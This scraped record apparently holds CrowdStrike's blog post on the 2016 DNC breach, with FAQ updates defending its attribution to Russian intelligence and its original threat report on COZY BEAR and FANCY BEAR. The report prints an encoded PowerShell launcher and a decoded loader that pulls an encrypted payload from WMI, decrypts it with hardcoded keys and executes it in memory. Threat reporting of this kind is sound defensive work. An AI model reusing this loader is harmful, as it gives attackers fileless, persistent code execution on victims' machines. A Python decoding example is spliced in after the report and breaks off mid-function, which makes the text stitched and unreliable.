{
	"id": "0652eaa0-eba9-4a26-b6fa-ab1b23996d78",
	"created_at": "2026-04-06T00:13:39.936274Z",
	"updated_at": "2026-04-10T03:37:50.106661Z",
	"deleted_at": null,
	"sha1_hash": "c2621e0a5c1e5ea12983cc105c4e671f7af41d98",
	"title": "CrowdStrike’s work with the Democratic National Committee: Setting the record straight",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 159929,
	"plain_text": "CrowdStrike’s work with the Democratic National Committee: Setting\r\nthe record straight\r\nBy Editorial Team\r\nArchived: 2026-04-05 14:19:27 UTC\r\nJune 5, 2020 UPDATE\r\nBlog update following the release of the testimony by Shawn Henry, CSO and President of CrowdStrike Services, before the\r\nHouse Intelligence Committee that was recently declassified.\r\nWhat was CrowdStrike’s role in investigating the hack of the DNC?\r\nCrowdStrike was contacted on April 30, 2016 to respond to a suspected breach. We began our work with the DNC on May\r\n1, 2016, collecting intelligence and analyzing the breach. After conducting this analysis and identifying the adversaries on\r\nthe network, on June 10, 2016 we initiated a coordinated remediation event to ensure the intruders were removed and could\r\nnot regain access. That remediation process lasted approximately 2-3 days and was completed on June 13, 2016.\r\nWhy did the DNC contact CrowdStrike?\r\nThe DNC contacted CrowdStrike to respond to a suspected cyber attack impacting its network. The DNC was first alerted to\r\nthe hack by the FBI in September 2015. According to testimony by DNC IT contractor Yared Tamene Wolde-Yohannes, the\r\nFBI attributed the breach to the Russian Government in September 2015 (page 7).\r\nWhy did the DNC hire CrowdStrike instead of just working with the FBI to investigate the hack?\r\nThe FBI doesn’t perform incident response or network remediation services when organizations need to get back to business\r\nafter a breach. CrowdStrike is a leader in protecting customers around the world from cyber threats. It is common for\r\norganizations to hire third-party industry experts, like CrowdStrike, to investigate and remediate cyber attacks when they\r\nsuspect a breach even if they are collaborating with law enforcement. 
As John Carlin, former Assistant Attorney General for\r\nthe National Security Division at The Department of Justice, testified before the House Intelligence Committee (cited from\r\npage 21 of his testimony): “A lot of -- outside of any political organization, companies, most corporations, they often would\r\nuse these third party contractors, who they hired through their own counsel, and maximize the control from the point of view\r\nof the victim.”\r\nDid CrowdStrike have proof that Russia hacked the DNC?\r\nYes, and this is also supported by the U.S. Intelligence community and independent Congressional reports. Following a\r\ncomprehensive investigation that CrowdStrike detailed publicly, the company concluded in May 2016 that two separate\r\nRussian intelligence-affiliated adversaries breached the DNC network. To reference, CrowdStrike’s account of their DNC\r\ninvestigation, published on June 14, 2016, “CrowdStrike Services Inc., our Incident Response group, was called by the\r\nDemocratic National Committee (DNC), the formal governing body for the US Democratic Party, to respond to a suspected\r\nbreach. We deployed our IR team and technology and immediately identified two sophisticated adversaries on the network –\r\nCOZY BEAR and FANCY BEAR…. At DNC, COZY BEAR intrusion has been identified going back to summer of 2015, while\r\nFANCY BEAR separately breached the network in April 2016.” This conclusion has most recently been supported by the\r\nSenate Intelligence Committee in April 2020 issuing a report validating the previous conclusions of the Intelligence\r\ncommunity, published on January 6, 2017, that Russia was behind the DNC data breach. 
The Senate report states on page\r\n48: “The Committee found that specific intelligence as well as open source assessments support the assessment that\r\nPresident Putin approved and directed aspects of this influence campaign.” Furthermore, in his testimony in front of the\r\nHouse Intelligence Committee, Shawn Henry stated the following with regard to CrowdStrike’s degree of confidence that\r\nthe intrusion activity can be attributed to Russia, cited from page 24:\r\nMR. HENRY: We said that we had a high degree of confidence it was the Russian Government. And our analysts that\r\nlooked at it and that had looked at these types of attacks before, many different types of attacks similar to this in\r\ndifferent environments, certain tools that were used, certain methods by which they were moving in the\r\nenvironment, and looking at the types of data that was being targeted, that it was consistent with a nation-state\r\nadversary and associated with Russian intelligence.\r\nHave any other organizations concluded that Russia was behind the DNC hack?\r\nYes. CrowdStrike’s conclusion that Russia was behind the DNC hack is supported by the U.S. Intelligence community and\r\nalso by independent Congressional reports. 
Most recently, the Senate Intelligence Committee released a report in April 2020\r\nthat validated the previous conclusions of the Intelligence Community Assessment, published on January 6, 2017, all\r\nconcluding that Russia was behind the DNC data breach.\r\nhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/\r\nPage 1 of 8\n\nPage 157 of the Senate report states that the Select Committee on Intelligence “conducted an extensive examination\r\nof the intelligence demonstrating Russia's intrusions into DNC networks.” Senator Richard Burr (R - North\r\nCarolina), who served as Chairman of the Senate Intelligence Committee at the time the report was issued, confirmed\r\nthis finding: “The Committee found no reason to dispute the Intelligence Community’s conclusions.”\r\nThe Intelligence Community Assessment, published on January 6, 2017, also confirms that Russia was behind the\r\nDNC hack, stating on page 2 of the report: “In July 2015, Russian intelligence gained access to Democratic National\r\nCommittee (DNC) networks and maintained that access until at least June 2016.” This unclassified ODNI report was\r\nbased on extensive classified intelligence collected by the CIA, NSA, and FBI; the ODNI determined the classified\r\nintelligence should not be released in order to protect the sensitive sources and methods by which it was collected.\r\nIt’s also worth noting that other security companies, including Fidelis and FireEye, have supported CrowdStrike’s analysis.\r\nDoes CrowdStrike have evidence that data was exfiltrated from the DNC network?\r\nYes. Shawn Henry stated in his testimony to the House Intelligence Committee that CrowdStrike had indicators of\r\nexfiltration (page 32) and that data had clearly left the network. 
The Intelligence Community Assessment\r\nalso confirmed, on page 2, that the Russian intelligence agency GRU “had exfiltrated large volumes of data from the DNC.”\r\nDid CrowdStrike see in real-time the adversaries exfiltrate data and emails from the DNC network?\r\nNo, and that’s typical for incident response cases. In the vast majority of cyber investigations, incident responders don’t\r\nwitness exfiltration in real time. In fact, often we are called in after theft has taken place. We collect forensics, evidence of\r\nprior activity on the network, map where the adversary has gained access and prepare remediation plans. In this particular\r\ncase, CrowdStrike saw circumstantial evidence of data exfiltration from the DNC network. As a reference point,\r\ncircumstantial evidence is the type of evidence, such as DNA analysis or fingerprints, that is fully admissible in court.\r\nShawn Henry stated in his testimony that CrowdStrike had indicators of exfiltration (page 32 of the testimony): “Counsel\r\njust reminded me that, as it relates to the DNC, we have indicators that data was exfiltrated. We did not have concrete\r\nevidence that data was exfiltrated from the DNC, but we have indicators that it was exfiltrated,” and circumstantial evidence\r\nthat data was taken, as he states on page 75 (“so there is circumstantial evidence that it was taken”) and page 76: “MR.\r\nHENRY: So, to go back, because I think it's important to characterize this. We didn't have a network sensor in place that saw\r\ndata leave. We said that the data left based on the circumstantial evidence. That was a conclusion that we made. When I\r\nanswered that question, I was trying to be as factually accurate. I want to provide the facts. 
So I said that we didn't have\r\ndirect evidence. But we made a conclusion that the data left the network.” On page 32 of the testimony, Henry also explains\r\nthat “We don't have video of it happening, but there are indicators that it happened” and “we did not have concrete\r\nevidence that data was exfiltrated from the DNC, but we have indicators that it was exfiltrated.” As another reference point,\r\nthe independent report by Special Counsel Robert S. Mueller also cites the theft of documents from the DNC and DCCC on\r\npage 40, stating the following: “Officers from Unit 26165 stole thousands of documents from the DCCC and DNC networks,\r\nincluding significant amounts of data pertaining to the 2016 U.S. federal elections. Stolen documents included internal\r\nstrategy documents, fundraising data, opposition research, and emails from the work inboxes of DNC employees.”\r\nIs it true that part of the exfiltration happened after CrowdStrike was already engaged by the DNC?\r\nThis question about the specific timeline of the exfiltration is addressed directly by Shawn Henry in his testimony on page\r\n26. “MR. HENRY: So the analysis started the first day or two in May, and then that was about 4 to 6 weeks. I think, on June\r\n10th, we started what we call the remediation event. So we collected enough intelligence. We identified where the\r\nadversaries were in the environment. We came up with a remediation plan to say we see them in multiple locations. This -\r\nthese are the actions that we need to execute in order to put a new infrastructure in place and to ensure that the adversaries\r\ndon't have access to the new infrastructure. So that would have been June 10th when we started. And we did the remediation\r\nevent over a couple of days.” Of note, it is standard practice in incident response to first coordinate a remediation event to\r\nprevent the adversary from doing further damage, and following that to fully restore network functionality. 
We followed\r\nindustry best practices to accomplish the fastest remediation path for our customer. On page 27 of Shawn Henry’s testimony,\r\nhe further explains CrowdStrike’s role as incident responders: “To be clear, our goal, my goal was to protect the client. We\r\nwere hired to protect the client. We identified an adversary there. The goal was to make sure that the adversary was removed\r\nand the client had a clean environment with which to work.”\r\nDid any DNC endpoints protected by your technology get breached in subsequent attacks?\r\nThere is no indication of subsequent breaches taking place on any DNC machine protected by CrowdStrike Falcon®.\r\nDo you have a comment about the allegation that Russia stole Democratic Party emails from John Podesta and then\r\npassed them to WikiLeaks?\r\nCrowdStrike was not involved in investigating John Podesta’s email leaks. Henry says on page 62 of his testimony that he “has\r\nno relationship with them.”\r\nWhat is the timeline of the DNC hack?\r\nAccording to public records, this is the timeline of the DNC hack that CrowdStrike was hired to investigate.\r\nBeginning in July 2015: “Russian intelligence gained access to Democratic National Committee (DNC) networks”\r\n(page 2).\r\nSept. 25, 2015: An FBI agent contacted the DNC Information Technology director/contractor in charge of the DNC\r\nnetwork, alerting him to suspicious activity in the network and referencing the “Dukes” (p16), a well-known\r\npseudonym in the cybersecurity community for Russian government actors. 
The FBI agent called the DNC again in\r\nOctober 2015, November 2015, December 2015 (p12) asking the contractor to “corroborate, to look into specific\r\nactivities that the FBI had noticed emanating from the DNC network that could be nefarious.” (p8)\r\nBeginning in December 2015: Russian intelligence actors engaged in attacks on election systems, including\r\nscanning a “widely used vendor of election systems,” according to DHS. The attacks continued through June\r\n2016 (p30.)\r\nBeginning April 2016: The GRU “…stole thousands of documents from the DCCC and DNC networks, including\r\nsignificant amounts of data pertaining to the 2016 U.S. federal elections. Stolen documents included internal strategy\r\ndocuments, fundraising data, opposition research, and emails from the work inboxes of DNC employees.” (p40)\r\nApril 14, 2016: “The GRU began stealing DCCC data shortly after it gained access to the network. On April 14,\r\n2016 (approximately three days after the initial intrusion) GRU officers downloaded rar.exe onto the DCCC’s\r\ndocument server. The following day, the GRU searched one compromised DCCC computer for files containing\r\nsearch terms that included “Hillary,” “DNC,” “Cruz,” and “Trump.\"\r\nApril 28, 2016: The DNC contractor discovered unusual activity on the DNC network. “…the first day that we found\r\nactivity on our network that was unusual, nefarious by adversaries…” \"we saw sort of very loud activity… on one of\r\nour Window servers that couldn't have been done by one of us…an authorized user. The kinds of activity we were\r\nlooking at was accessing multiple different password vaults of different users, which is not something that anyone\r\nwould do. And so that triggered an alarm for us…” (p24)\r\nApril 30, 2016: CrowdStrike was contacted by the DNC outside counsel to discuss a suspected breach. This was\r\nCrowdStrike’s first involvement in this matter. 
(p6)\r\nMay 1-2, 2016: CrowdStrike initiated an investigation into the breach of the DNC network. (p26)\r\nJune 10-13, 2016: The DNC network remediation took place. (p35)\r\nJune 13, 2016: CrowdStrike and the DNC outside counsel alerted the FBI that they had identified Russian actors on\r\nthe DNC network. (p35)\r\nJune 2016: The FBI requested forensic information, indicators of compromise (pieces of malicious code) that\r\nCrowdStrike discovered on the DNC computer network. With DNC permission, CrowdStrike continued to share\r\ninformation from the breach through December 2016, including “digital images” or copies of hard-drives. (p35)\r\nJune 14, 2016: The DNC, via CrowdStrike, publicly announced the breach of the DNC network and detailed its\r\ninvestigation.\r\nJuly 29, 2016: The DCCC publicly announced it was a victim of Russian hacking.\r\nAugust 26, 2016: Separate cyber activity continued on state election systems through Dec 29, 2016 ( p25-26.) Later\r\nit was discovered the Russians had, at least, scanned a total of 21 state election infrastructures. (p50)\r\nSeptember 20, 2016: “On September 20, 2016, the GRU began to generate copies of the DNC data using function\r\ndesigned to allow users to produce backups of databases (referred to as “snapshots”). The GRU then stole those\r\nsnapshots by moving them to account that they controlled, from there the copies were moved to GRU-controlled\r\ncomputers. The GRU stole approximately 300 gigabytes of data from the DNC cloud-based account.” (pp 49-50)\r\nOctober 7, 2016: DHS \u0026 ODNI release joint statement about stolen emails: “The U.S. Intelligence Community\r\n(USIC) is confident that the Russian Government directed the recent compromises of e-mails from US persons and\r\ninstitutions, including from US political organizations….These thefts and disclosures are intended to interfere with\r\nthe US election process.(p1)\r\nJanuary 6, 2017. 
“The Department of Homeland Security (DHS) designated the infrastructure used to administer the\r\nNation’s elections as critical infrastructure. This designation recognizes that the United States’ election infrastructure\r\nis of such vital importance to the American way of life that its incapacitation or destruction would have a devastating\r\neffect on the country.” (p1)\r\nJanuary 22, 2020 UPDATE\r\nCrowdStrike is non-partisan - we routinely work with both Republican and Democratic organizations to protect them from\r\ncyber-attacks - along with thousands of other organizations around the world of all industries and sizes. Here are a few key\r\nfacts about CrowdStrike:\r\nWe were founded in California and are headquartered in the heart of Silicon Valley in Sunnyvale, California. We are\r\none of the fastest-growing global companies in cybersecurity today.\r\nOur founders have no connections to Ukraine. Suggestions to the contrary are completely false.\r\nWe have never had physical possession of the DNC servers. We conducted our investigation using a process called\r\n“imaging” — an established practice in cyber investigations that involves making a copy of the hard drives and\r\nmemory. This is standard procedure for cyber investigations.\r\nWe worked closely with law enforcement and provided all forensic evidence and analysis to the FBI as requested.\r\nWe are proud of our work and will remain focused on our mission of protecting our customers around the world from\r\ndangerous cyber threats. We are grateful that the media has debunked false claims about our work for the Democratic\r\nNational Committee (DNC) in 2016:\r\nThe Washington Post, The Russians manipulated our elections. 
We helped.\r\nAn opinion piece by David Ignatius discussing the lessons from Thomas Rid’s new book, making the case that\r\nthe 2016 election meddling was a proven example of Russia’s disinformation tenet.\r\nThe New York Times, Republican-Led Review Backs Intelligence Findings on Russian Interference:\r\nA three-year review by the Republican-led Senate Intelligence Committee unanimously found that the\r\nintelligence community assessment stating that Russia breached the DNC was fundamentally sound and\r\nuntainted by politics.\r\nNBC News, Meet the Press 12/29/19:\r\nClint Watts and Chuck Todd discuss CrowdStrike and the conspiracy theory that has been debunked.\r\nTranscript here: https://www.nbcnews.com/meet-the-press/meet-press-december-29-2019-n1106036\r\nThe Washington Post, In call to Ukraine’s president, Trump revived a favorite conspiracy theory about the DNC\r\nhack:\r\nDiscusses the CrowdStrike conspiracy theory and how it has been debunked.\r\nCNN Business, What is CrowdStrike and why is it part of the Trump whistleblower complaint?:\r\nGives background on CrowdStrike and debunks the conspiracy theory\r\nWired, How Trump’s Ukraine Mess Entangled CrowdStrike:\r\nDiscusses the CrowdStrike theory and debunks the idea that there is a missing server.\r\nNBC News, Debunking The Crowdstrike Conspiracy Theory\r\nDiscusses the CrowdStrike theory and how it has been debunked.\r\nThe Daily Beast, The Truth About Trump’s Insane Ukraine ‘Server’ Conspiracy:\r\nDescribes why Trump’s theories about Ukraine and CrowdStrike have been debunked.\r\nCNN, “Don’t miss the totally debunked conspiracy theory Donald Trump pushed in the Ukraine call”\r\nDiscusses the conspiracy theory and how it has been debunked.\r\nSeptember 25, 2019 Update:\r\nWith regards to our investigation of the DNC hack in 2016, we provided all forensic evidence and analysis to the FBI. 
As\r\nwe’ve stated before, we stand by our findings and conclusions that have been fully supported by the US Intelligence\r\ncommunity.\r\nFAQ on Recent News Coverage of CrowdStrike\r\nIs your owner Ukrainian?\r\nNo. CrowdStrike was founded by George Kurtz and Dmitri Alperovitch. George is an American entrepreneur and\r\nrecognized security expert, author, entrepreneur, and speaker. He also started Foundstone, a worldwide security products and\r\nservices company that was acquired by McAfee in 2004. CrowdStrike’s Co-founder Dmitri Alperovitch is a Russia-born\r\nU.S. citizen, who has spent all of his adult life in the United States, and has no connection to Ukraine. As a public company,\r\nour ownership is available on the SEC.gov website.\r\nDo you stand behind your work for the DNC?\r\nAs we’ve repeatedly stated, we stand by the findings and analysis of our investigation, and, as detailed in our company\r\nstatement, we’ve provided all forensic evidence and analysis to the FBI as requested. Additionally, our findings have been\r\nsupported by the U.S. intelligence community and other cybersecurity companies. The investigation is detailed on our blog\r\nbelow.\r\nDid you comply with FBI’s requests for information?\r\nWe’ve provided all forensic evidence and analysis to the FBI related to the DNC investigation as requested. We have never\r\ndeclined any request for information from the FBI related to this investigation, and there are no pending requests for\r\ninformation by the FBI.\r\nDo you have the DNC servers?\r\nWe have never taken physical possession of any DNC servers. When cyber investigators respond to an incident, they capture\r\nthat evidence in a process called “imaging.” It involves making an exact byte-for-byte copy of the hard drives. They do the\r\nsame for the machine’s memory, capturing evidence that would otherwise be lost at the next reboot, and they monitor and\r\nstore the traffic passing through the victim’s network. 
This has been standard procedure in incident response investigations\r\nfor decades. The images, not the computer’s hardware, provide the evidence. Our cloud-native, crowdsourced approach to\r\nsolving cybersecurity enables us to deliver state-of-the-art protection to organizations big and small. Consequently, we are\r\nproud that customers from every major industry, level of government, and political affiliation turn to CrowdStrike to stop\r\nbreaches.\r\nAre you affiliated with the Democratic party?\r\nCrowdStrike is not affiliated with any political party. We are a public cybersecurity company and are non-partisan. We have\r\ndone cybersecurity work for, and currently protect, both Republican and Democratic political organizations at the state,\r\nlocal, and federal level, and we have thousands of non-political companies and organizations as customers.\r\nDo you have Secretary Hillary Clinton’s email server? Have you ever had access to her emails?\r\nNo. We have never worked for Secretary Clinton or her campaign, and never had access to her server or emails.\r\nWhere can I find more information?\r\nMany news outlets have written about CrowdStrike’s investigation of the DNC hack and subsequent comments made by\r\nPresident Trump. 
You can learn more at:\r\nNBC News, November 14, 2019: Debunking The Crowdstrike Conspiracy Theory\r\nCNN, September 30, 2019: \"Don't miss the totally debunked conspiracy theory Donald Trump pushed in the Ukraine\r\ncall\"\r\nAP/Washington Post, September 27, 2019: \"Why Trump asked Ukraine’s president about ‘CrowdStrike’\"\r\nDaily Beast, September 25, 2019: \"The Truth About Trump’s Insane Ukraine ‘Server’ Conspiracy\"\r\nWired, September 25, 2019: \"How Trump’s Ukraine Mess Entangled CrowdStrike\"\r\nDaily Beast, July 17, 2019: \"Trump’s ‘Missing DNC Server’ Is Neither Missing Nor a Server\"\r\nSecurity Week, October 4, 2018: \"The DNC Hacker Indictment: A Lesson in Failed Misattribution\"\r\nDaily Beast, July 16, 2018 : \"Trump’s ‘Missing DNC Server’ Is Neither Missing Nor a Server\"\r\nDaily Beast, June 13, 2018: \"Mueller Indicts 12 Russian Officers for Hacking Dems in 2016\"\r\nU.S. Department of Justice Indictment, June 13, 2018: \"Case 1:18-cr-00215-ABJ\"\r\nArsTechnica, March 23, 2018: \"DNC “lone hacker” Guccifer 2.0 pegged as Russian spy after opsec fail”\r\nTech Crunch, March 22, 2018: \"More evidence ties alleged DNC hacker Guccifer 2.0 to Russian intelligence”\r\nAP, January 26, 2018: \"Report: Dutch spies caught Russian hackers on tape”\r\nDe Volkskrant, January 25, 2018: \"Dutch Intelligence Watched Russian Hackers Attack the U.S”\r\nAP, November 2, 2017: \"Russia hackers pursued Putin foes, not just US Democrats”\r\nThe Hill, August 14, 2017: \"Why the latest theory about the DNC not being hacked is probably wrong”\r\nDaily Beast, July 20, 2017: \"Putin’s Hackers Now Under Attack—From Microsoft”\r\nWashington Post, July 6, 2017: \"Here’s the public evidence that supports the idea that Russia interfered in the 2016\r\nelection”\r\nSenate testimony of Thomas Rid, March 30, 2017\r\nSenate testimony of Kevin Mandia, March 30, 2017\r\nWired Magazine, March 5, 2017: “Hunting the DNC hackers: how Crowdstrike found proof Russia hacked 
the\r\nDemocrats”\r\nNew York Times, Jan. 6, 2017: “Intelligence Report on Russian Hacking” (includes full copy of the official U.S.\r\nIntelligence and Law Enforcement Agency report):\r\nNew York Times, Dec. 13, 2016: “The Perfect Weapon: How Russian Cyberpower Invaded the U.S.”\r\nWashington Post, June 20, 2016: “Cyber researchers confirm Russian government hack of Democratic National\r\nCommittee”\r\nThreatConnect Blog, June 17, 2016: “Rebooting Watergate: Tapping into the Democratic National Committee”\r\nSecureWorks Blog, June 16, 2016: “Russian Threat Group Targets Clinton Campaign”\r\nJune 15, 2016 UPDATE:\r\nCrowdStrike stands fully by its analysis and findings identifying two separate Russian intelligence-affiliated adversaries\r\npresent in the DNC network in May 2016. On June 15, 2016 a blog post to a Wordpress site authored by an individual using\r\nthe moniker Guccifer 2.0 claimed credit for breaching the Democratic National Committee. This blog post presents\r\ndocuments alleged to have originated from the DNC. Whether or not this posting is part of a Russian Intelligence\r\ndisinformation campaign, we are exploring the documents’ authenticity and origin. Regardless, these claims do nothing to\r\nlessen our findings relating to the Russian government’s involvement, portions of which we have documented for the public\r\nand the greater security community.\r\nJune 14, 2016\r\nBears in the Midst: Intrusion Into the Democratic National Committee\r\nBy Dmitri Alperovitch\r\nThere is rarely a dull day at CrowdStrike where we are not detecting or responding to a breach at a company somewhere\r\naround the globe. In all of these cases, we operate under strict confidentiality rules with our customers and cannot reveal\r\npublicly any information about these attacks. 
But on rare occasions, a customer decides to go public with information about\r\ntheir incident and gives us permission to share our knowledge of the adversary tradecraft with the broader community and\r\nhelp protect even those who do not happen to be our customers. This story is about one of those cases. CrowdStrike Services\r\nInc., our Incident Response group, was called by the Democratic National Committee (DNC), the formal governing body for\r\nthe US Democratic Party, to respond to a suspected breach. We deployed our IR team and technology and immediately\r\nidentified two sophisticated adversaries on the network - COZY BEAR and FANCY BEAR. We’ve had lots of experience\r\nwith both of these actors attempting to target our customers in the past and know them well. In fact, our team considers them\r\nsome of the best threat actors out of all the numerous nation-state, criminal and hacktivist/terrorist groups we encounter on a\r\ndaily basis. Their tradecraft is superb, their operational security second to none, and their extensive usage of ‘living-off-the-land’\r\ntechniques enables them to easily bypass many security solutions they encounter. In particular, we identified advanced\r\nmethods consistent with nation-state level capabilities including deliberate targeting and ‘access management’ tradecraft -\r\nboth groups were constantly going back into the environment to change out their implants, modify persistence methods, move\r\nto new Command \u0026 Control channels and perform other tasks to try to stay ahead of being detected. Both adversaries\r\nengage in extensive political and economic espionage for the benefit of the government of the Russian Federation and are\r\nbelieved to be closely linked to the Russian government’s powerful and highly capable intelligence services. 
COZY BEAR\r\n(also referred to in some industry reports as CozyDuke or APT 29) is the adversary group that last year successfully\r\ninfiltrated the unclassified networks of the White House, State Department, and US Joint Chiefs of Staff. In addition to the\r\nUS government, they have targeted organizations across the Defense, Energy, Extractive, Financial, Insurance, Legal,\r\nManufacturing Media, Think Tanks, Pharmaceutical, Research and Technology industries, along with Universities. Victims\r\nhave also been observed in Western Europe, Brazil, China, Japan, Mexico, New Zealand, South Korea, Turkey and Central\r\nAsian countries. COZY BEAR’s preferred intrusion method is a broadly targeted spearphish campaign that typically\r\nincludes web links to a malicious dropper. Once executed on the machine, the code will deliver one of a number of\r\nsophisticated Remote Access Tools (RATs), including AdobeARM, ATI-Agent, and MiniDionis. On many occasions, both\r\nthe dropper and the payload will contain a range of techniques to ensure the sample is not being analyzed on a virtual\r\nmachine, using a debugger, or located within a sandbox. They have extensive checks for the various security software that is\r\ninstalled on the system and their specific configurations. When specific versions are discovered that may cause issues for the\r\nRAT, it promptly exits. These actions demonstrate a well-resourced adversary with a thorough implant-testing regime that is\r\nhighly attuned to slight configuration issues that may result in their detection, and which would cause them to deploy a\r\ndifferent tool instead. The implants are highly configurable via encrypted configuration files, which allow the adversary to\r\ncustomize various components, including C2 servers, the list of initial tasks to carry out, persistence mechanisms, encryption\r\nkeys and others. An HTTP protocol with encrypted payload is used for the Command \u0026 Control communication. 
FANCY\r\nBEAR (also known as Sofacy or APT 28) is a separate Russian-based threat actor, which has been active since mid 2000s,\r\nand has been responsible for targeted intrusion campaigns against the Aerospace, Defense, Energy, Government and Media\r\nsectors. Their victims have been identified in the United States, Western Europe, Brazil, Canada, China, Georgia, Iran,\r\nJapan, Malaysia and South Korea. Extensive targeting of defense ministries and other military victims has been observed,\r\nthe profile of which closely mirrors the strategic interests of the Russian government, and may indicate affiliation with\r\nГлавное Разведывательное Управление (Main Intelligence Department) or GRU, Russia’s premier military intelligence\r\nservice. This adversary has a wide range of implants at their disposal, which have been developed over the course of many\r\nyears and include Sofacy, X-Agent, X-Tunnel, WinIDS, Foozer and DownRage droppers, and even malware for Linux,\r\nOSX, IOS, Android and Windows Phones. This group is known for its technique of registering domains that closely\r\nresemble domains of legitimate organizations they plan to target. Afterwards, they establish phishing sites on these domains\r\nthat spoof the look and feel of the victim’s web-based email services in order to steal their credentials. FANCY BEAR has\r\nalso been linked publicly to intrusions into the German Bundestag and France’s TV5 Monde TV station in April 2015. At\r\nDNC, COZY BEAR intrusion has been identified going back to summer of 2015, while FANCY BEAR separately breached\r\nthe network in April 2016. We have identified no collaboration between the two actors, or even an awareness of one by the\r\nother.\r\nInstead, we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of\r\nidentical credentials. 
While you would virtually never see Western intelligence agencies going after the same target without de-confliction, for fear of compromising each other’s operations, in Russia this is not an uncommon scenario. “Putin’s Hydra: Inside Russia’s Intelligence Services”, a recent paper from the European Council on Foreign Relations, does an excellent job of outlining the highly adversarial relationship between Russia’s main intelligence services: Федеральная Служба Безопасности (FSB), the primary domestic intelligence agency but one with a significant external collection and ‘active measures’ remit as well; Служба Внешней Разведки (SVR), the primary foreign intelligence agency; and the aforementioned GRU. Not only do they have overlapping areas of responsibility, but they also rarely share intelligence and even occasionally steal sources from each other and compromise each other’s operations. Thus, it is not surprising to see them engage in intrusions against the same victim, even when it may be a waste of resources and lead to the discovery and potential compromise of both operations.\r\nThe COZY BEAR intrusion relied primarily on the SeaDaddy implant, developed in Python and compiled with py2exe, and on a PowerShell backdoor whose persistence was accomplished via the Windows Management Instrumentation (WMI) system, which allowed the adversary to launch malicious code automatically after a specified period of system uptime or on a specific schedule. The PowerShell backdoor is ingenious in its simplicity and power. 
It consists of a single obfuscated command set up to run persistently, such as:\r\npowershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQApAA0ACgB7AA0ACgAJACQA\r\nThis decodes to:\r\n# Run the supplied ICryptoTransform over $data through a CryptoStream and return the output bytes\r\nfunction perfCr($crTr, $data)\r\n{\r\n    $ret = $null\r\n    try{\r\n        $ms = New-Object System.IO.MemoryStream\r\n        $cs = New-Object System.Security.Cryptography.CryptoStream -ArgumentList @($ms, $crTr, [System.Security.Cryptography.CryptoStreamMode]::Write)\r\n        $cs.Write($data, 0, $data.Length)\r\n        $cs.FlushFinalBlock()\r\n        $ret = $ms.ToArray()\r\n        $cs.Close()\r\n        $ms.Close()\r\n    }\r\n    catch{}\r\n    return $ret\r\n}\r\n# AES-decrypt $encData with the per-host key and IV defined below\r\nfunction decrAes($encData, $key, $iv)\r\n{\r\n    $ret = $null\r\n    try{\r\n        $prov = New-Object System.Security.Cryptography.RijndaelManaged\r\n        $prov.Key = $key\r\n        $prov.IV = $iv\r\n        $decr = $prov.CreateDecryptor($prov.Key, $prov.IV)\r\n        $ret = perfCr $decr $encData\r\n    }\r\n    Catch{}\r\n    return $ret\r\n}\r\n# Read the base64 payload stored in property $pN of WMI class $cN, decrypt it and execute it in memory\r\nfunction sWP($cN, $pN, $aK, $aI)\r\n{\r\n    if($cN -eq $null -or $pN -eq $null){return $false}\r\n    try{\r\n        $wp = ([wmiclass]$cN).Properties[$pN].Value\r\n        $exEn = [System.Convert]::FromBase64String($wp)\r\n        $exDec = decrAes $exEn $aK $aI\r\n        $ex = [System.Text.Encoding]::UTF8.GetString($exDec)\r\n        if($ex -eq $null -or $ex -eq ''){return}\r\n        Invoke-Expression $ex\r\n        return $true\r\n    }\r\n    catch{ return $false }\r\n}\r\n$aeK = [byte[]] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee, 0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed, 0xff, 0x02, 0x43, 0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)\r\n$aeI = [byte[]] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7, 0xaa, 0x6d, 0xe9, 0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67)\r\nsWP 'Wmi' 'Wmi' $aeK $aeI | Out-Null\r\nThis one-line PowerShell command, stored only in the WMI repository, establishes an encrypted connection to the C2 server and downloads additional PowerShell modules from it, executing them in memory. In theory, the additional modules can do virtually anything on the victim system. 
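To see what such a launcher carries, decode the -EncodedCommand value the way PowerShell does (base64 over UTF-16LE text) and then look in the decoded script for the building blocks of this loader. The Python below is an added example, not code from the original post or CrowdStrike's tooling; it decodes the truncated blob quoted above, and the LOADER_SCRIPT stand-in, the benign command line, the scoring weights and the threshold are constructed for the example.

```python
"""Decode and triage PowerShell -EncodedCommand launchers like the one above."""
import base64
import re

# ---- sample inputs ----------------------------------------------------------
# The blob is the (truncated) one quoted in the report; everything else here is
# constructed to exercise the benign and fully-encoded cases.
REPORT_BLOB = ("ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQApAA0ACgB7AA0ACgAJACQA")
REPORT_CMDLINE = "powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand " + REPORT_BLOB
# A condensed stand-in for the WMI-resident loader shown above, not the real one.
LOADER_SCRIPT = (
    "$wp = ([wmiclass]'Wmi').Properties['Wmi'].Value\n"
    "$exEn = [System.Convert]::FromBase64String($wp)\n"
    "$prov = New-Object System.Security.Cryptography.RijndaelManaged\n"
    "$ex = [System.Text.Encoding]::UTF8.GetString((decrAes $exEn $aeK $aeI))\n"
    "Invoke-Expression $ex\n")
BENIGN_CMDLINE = "powershell.exe -NoProfile -Command Get-Date"


def encode_command(script):
    """Build an -EncodedCommand value the way PowerShell expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob):
    """Reverse encode_command(). Blobs seen in logs are often cut short (field
    limits, quoting), so repair padding and drop a dangling byte rather than fail."""
    blob = re.sub(r"[^A-Za-z0-9+/]", "", blob)
    if len(blob) % 4 == 1:          # a lone trailing sextet can never decode
        blob = blob[:-1]
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
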